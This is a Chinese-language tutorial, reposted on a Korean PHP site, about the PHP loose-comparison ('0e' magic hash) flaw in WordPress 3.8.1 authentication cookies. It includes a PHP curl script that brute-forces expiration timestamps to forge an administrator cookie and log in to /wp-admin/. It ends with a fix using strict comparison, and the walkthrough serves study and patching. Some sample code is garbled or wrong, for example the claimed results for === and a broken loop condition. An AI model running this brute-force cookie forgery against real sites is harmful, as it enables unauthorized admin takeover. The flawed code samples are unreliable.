>백엔드 개발 >PHP 튜토리얼 >PHP弱类型:WordPress Cookie仿冒

PHP弱类型:WordPress Cookie仿冒

WBOY
WBOY원래의
2016-06-13 12:23:411037검색

PHP弱类型:WordPress Cookie伪造

1 PHP弱类型

  PHP是弱类型语言,所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 != 进行相等判断时,会自动进行类型转换,用 === 以及 !== 进行判断时不会自动转换类型。

<span style="color: #008080;">1</span> <span style="color: #000000;">php</span><span style="color: #008080;">2</span>     <span style="color: #800080;">$a</span> = 3<span style="color: #000000;">;</span><span style="color: #008080;">3</span>     <span style="color: #800080;">$b</span> = '3vic'<span style="color: #000000;">;</span><span style="color: #008080;">4</span>     <span style="color: #008080;">var_dump</span>(<span style="color: #800080;">$a</span> == <span style="color: #800080;">$b</span>);<span style="color: #008000;">//</span><span style="color: #008000;">true</span><span style="color: #008080;">5</span>     <span style="color: #008080;">var_dump</span>(<span style="color: #800080;">$a</span> != <span style="color: #800080;">$b</span>);<span style="color: #008000;">//</span><span style="color: #008000;">false</span><span style="color: #008080;">6</span>     <span style="color: #008080;">var_dump</span>(<span style="color: #800080;">$a</span> === <span style="color: #800080;">$b</span>);<span style="color: #008000;">//</span><span style="color: #008000;">true</span><span style="color: #008080;">7</span>     <span style="color: #008080;">var_dump</span>(<span style="color: #800080;">$a</span> !== <span style="color: #800080;">$b</span>);<span style="color: #008000;">//</span><span style="color: #008000;">false</span><span style="color: #008080;">8</span> ?>

 说明:在PHP中字符串转换成整型时,如果是数字开头就会转换成前面的数字('3vic' -> 3),如果不是数字开头,那么就会转换成0('vic' -> 0)

2 WordPress代码

  • WordPress 3.8.1 WordPress 3.8.2 部分代码区别
<span style="color: #008080;">1</span> <span style="color: #000000;">php</span><span style="color: #008080;">2</span>     <span style="color: #008000;">//</span><span style="color: #008000;"> WordPress 3.8.1</span><span style="color: #008080;">3</span>     <span style="color: #0000ff;">if</span> (<span style="color: #800080;">$hmac</span> != <span style="color: #800080;">$hash</span><span style="color: #000000;">) {}</span><span style="color: #008080;">4</span>     <span style="color: #008000;">//</span><span style="color: #008000;"> WordPress 3.8.2</span><span style="color: #008080;">5</span>     <span style="color: #0000ff;">if</span> ( hash_hmac('md5', <span style="color: #800080;">$hmac</span>, <span style="color: #800080;">$key</span>) !== hash_hmac('md5', <span style="color: #800080;">$hash</span>, <span style="color: #800080;">$key</span><span style="color: #000000;">) )  {}</span><span style="color: #008080;">6</span> ?>
  • Cookie 组成

  客户端后台只验证其中的一条Cookie,如下所示

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span style="color: #ff0000;">1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly

  其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ + md5(siteurl)  其中siteurl为WordPress的网址,此处网站地址为<span style="color: #ff0000;">http://www.test.ichunqiu</span>,md5加密后为<span style="color: #ff0000;">c47f4a97d0321c1980bb76fc00d1e78f</span>,其它部分也可省。

类型      用户名     过期时间        登录成功服务器端赋予客户端的hash值

对应变量 $username $expiration $hmac
cookies admin 1433403595 cf50f3b50eed94dd0fdc3d3ea2c7bbb

 

 

 

  • 分析验证登录

  代码 wp-includes/pluggable.php 第543-549行

<span style="color: #008080;">1</span> <span style="color: #000000;">php</span><span style="color: #008080;">2</span>     <span style="color: #800080;">$key</span> = wp_hash(<span style="color: #800080;">$username</span> . <span style="color: #800080;">$pass_frag</span> . '|' . <span style="color: #800080;">$expiration</span>, <span style="color: #800080;">$scheme</span><span style="color: #000000;">);</span><span style="color: #008080;">3</span>     <span style="color: #800080;">$hash</span> = hash_hmac('md5', <span style="color: #800080;">$username</span> . '|' . <span style="color: #800080;">$expiration</span>, <span style="color: #800080;">$key</span><span style="color: #000000;">);</span><span style="color: #008080;">4</span>     <span style="color: #0000ff;">if</span> ( <span style="color: #800080;">$hmac</span> != <span style="color: #800080;">$hash</span><span style="color: #000000;"> ) {</span><span style="color: #008080;">5</span>     do_action('auth_cookie_bad_hash', <span style="color: #800080;">$cookie_elements</span><span style="color: #000000;">);</span><span style="color: #008080;">6</span>     <span style="color: #0000ff;">return</span> <span style="color: #0000ff;">false</span><span style="color: #000000;">;</span><span style="color: #008080;">7</span> }

  在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有 $username 用户名,$expiration 有效期,又因为其中用户名是固定的,因此只有$expiration是可控的,所以我们可以从改变 <span style="color: #ff0000;">$expiration </span>的方法来改变$hash

  • 结合PHP Hash 比较缺陷分析 WordPress

  有以下几种可能使 $hmac == $hash 为真,字符串完全相等或者 $hmac 等于0的同时 <span style="color: #ff0000;">$hash</span> 为以字符开头的字符串; 将客户端的Cookie中 $hmac 值改为0,然后在if ( $hmac != $hash ) {的上面一行写入<span style="color: #ff0000;">var_dump($hmac);die()</span>;发现打印出来 $hmac 的结果是 string '0'而不是int 0, 那么有没有方法使字符串识别为整数呢,代码如下:

<span style="color: #008080;">1</span> <span style="color: #000000;">php</span><span style="color: #008080;">2</span> <span style="color: #008080;">var_dump</span>('0' == '0e156464513131');<span style="color: #008000;">//</span><span style="color: #008000;">true</span>

  其中的 0e156464513131 会被识别为0乘以10的156464513131次方,还是得0;因此当 $hash 以0e开头后面全是数字时就会与 <span style="color: #ff0000;">$hmac</span> 的值为 '0' 时相等,所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。

3 测试脚本

  通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。

<span style="color: #008080;"> 1</span> <span style="color: #000000;">php</span><span style="color: #008080;"> 2</span> <span style="color: #008000;">/*</span><span style="color: #008080;"> 3</span> <span style="color: #008080;"> 4</span> <span style="color: #008000;">本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测</span><span style="color: #008080;"> 5</span> <span style="color: #008000;">传入两个值</span><span style="color: #008080;"> 6</span> <span style="color: #008000;">  WordPress 的主页 $host</span><span style="color: #008080;"> 7</span> <span style="color: #008000;">  管理员用户名     $root</span><span style="color: #008080;"> 8</span> <span style="color: #008000;">*/</span><span style="color: #008080;"> 9</span>     <span style="color: #008080;">header</span>("Content-type:text/html;charset=utf-8"<span style="color: #000000;">);</span><span style="color: #008080;">10</span> <span style="color: #008080;">11</span>     <span style="color: #800080;">$host</span> = 'http://xxx.xxx.xxx';<span style="color: #008000;">//</span><span style="color: #008000;">主页地址 结尾不带'/'</span><span style="color: #008080;">12</span>     <span style="color: #800080;">$root</span> = 'user';<span style="color: #008000;">//</span><span style="color: #008000;">管理员用户名</span><span style="color: #008080;">13</span> <span style="color: #008080;">14</span>     <span style="color: #800080;">$url</span> = <span style="color: #800080;">$host</span>.'/wp-admin/';<span style="color: #008000;">//</span><span style="color: #008000;">后台管理地址    </span><span style="color: #008080;">15</span>     <span style="color: #800080;">$sitehash</span>=<span style="color: #008080;">md5</span>(<span style="color: #800080;">$host</span><span style="color: #000000;">); </span><span style="color: #008080;">16</span> <span style="color: #008080;">17</span>     <span style="color: #0000ff;">echo</span> "\nWelcome\n\n"<span style="color: #000000;">;</span><span style="color: #008080;">18</span>     <span style="color: #008000;">//</span><span style="color: #008000;">通过时间戳暴力破解cookie 实现伪造cookie</span><span style="color: #008080;">19</span>     <span style="color: #0000ff;">for</span>(<span style="color: #800080;">$i</span>=1500000000;<span style="color: #800080;">$i</span>$i++<span style="color: #000000;">){</span><span style="color: #008080;">20</span>         <span style="color: #800080;">$cookie</span> = "wordpress_".<span style="color: #800080;">$sitehash</span>."=".<span style="color: #800080;">$root</span>."|".<span style="color: #800080;">$i</span>."|0;";<span style="color: #008000;">//</span><span style="color: #008000;">组合构造cookie</span><span style="color: #008080;">21</span>         <span style="color: #800080;">$header</span> = <span style="color: #0000ff;">array</span><span style="color: #000000;">(</span><span style="color: #008080;">22</span>        "Content-Type:application/x-www-form-urlencoded",<span style="color: #008080;">23</span>       'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',<span style="color: #008080;">24</span>       "Cookie:".<span style="color: #800080;">$cookie</span>,<span style="color: #008080;">25</span> <span style="color: #000000;">      );</span><span style="color: #008080;">26</span> <span style="color: #008080;">27</span>         <span style="color: #800080;">$curl</span> = curl_init(); <span style="color: #008000;">//</span><span style="color: #008000;"> 启动一个CURL会话    </span><span style="color: #008080;">28</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_URL, <span style="color: #800080;">$url</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 要访问的地址</span><span style="color: #008080;">29</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span style="color: #008000;">//</span><span style="color: #008000;"> 使用自动跳转    </span><span style="color: #008080;">30</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_AUTOREFERER, 1); <span style="color: #008000;">//</span><span style="color: #008000;"> 自动设置Referer    </span><span style="color: #008080;">31</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HTTPGET, <span style="color: #0000ff;">true</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 发送一个常规的Post请求    </span><span style="color: #008080;">32</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HTTPHEADER, <span style="color: #800080;">$header</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 读取上面所储存的Cookie信息         </span><span style="color: #008080;">33</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span style="color: #008000;">//</span><span style="color: #008000;"> 获取的信息以文件流的形式返回 </span><span style="color: #008080;">34</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HEADER, <span style="color: #0000ff;">false</span><span style="color: #000000;">);</span><span style="color: #008080;">35</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HEADER, 0<span style="color: #000000;">);   </span><span style="color: #008080;">36</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span style="color: #008000;">//</span><span style="color: #008000;">让curl自动选择版本</span><span style="color: #008080;">37</span>         <span style="color: #800080;">$tmpInfo</span> = curl_exec(<span style="color: #800080;">$curl</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 执行操作</span><span style="color: #008080;">38</span>         <span style="color: #0000ff;">if</span> (curl_errno(<span style="color: #800080;">$curl</span><span style="color: #000000;">)) {    </span><span style="color: #008080;">39</span>         <span style="color: #0000ff;">echo</span> 'Errno'.curl_error(<span style="color: #800080;">$curl</span><span style="color: #000000;">);    </span><span style="color: #008080;">40</span> <span style="color: #000000;">        }    </span><span style="color: #008080;">41</span>         curl_close(<span style="color: #800080;">$curl</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 关闭CURL会话</span><span style="color: #008080;">42</span> <span style="color: #008080;">43</span> <span style="color: #008000;">        //匹配结果</span><span style="color: #008080;">44</span>         <span style="color: #0000ff;">if</span>(<span style="color: #008080;">strstr</span>(<span style="color: #800080;">$tmpInfo</span>,'我们准备了几个链接供您开始'<span style="color: #000000;">)){</span><span style="color: #008080;">45</span>             <span style="color: #0000ff;">echo</span>  "\n".'success : '.<span style="color: #800080;">$cookie</span>."\n\n"<span style="color: #000000;">;</span><span style="color: #008080;">46</span>             <span style="color: #0000ff;">break</span><span style="color: #000000;">;</span><span style="color: #008080;">47</span>         }<span style="color: #0000ff;">else</span><span style="color: #000000;">{</span><span style="color: #008080;">48</span>             <span style="color: #0000ff;">echo</span>  'fail : '.<span style="color: #800080;">$cookie</span>."\n"<span style="color: #000000;">;</span><span style="color: #008080;">49</span> <span style="color: #000000;">        }</span><span style="color: #008080;">50</span> <span style="color: #008080;">51</span> <span style="color: #000000;">    }</span><span style="color: #008080;">52</span> ?>    

  说明理论上32位的MD5值以0e开头的大概三亿分之一,碰撞到可以利用的 <span style="color: #ff0000;">$expiration </span>几率极低

5 修复方案

  PHP 中使用的哈希比较函数,将其中的 ==!= 分别更改为 ===!== 或者 将比较的两个变量使用MD5再加密一次。

学习笔记:http://ichunqiu.com/course/167

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.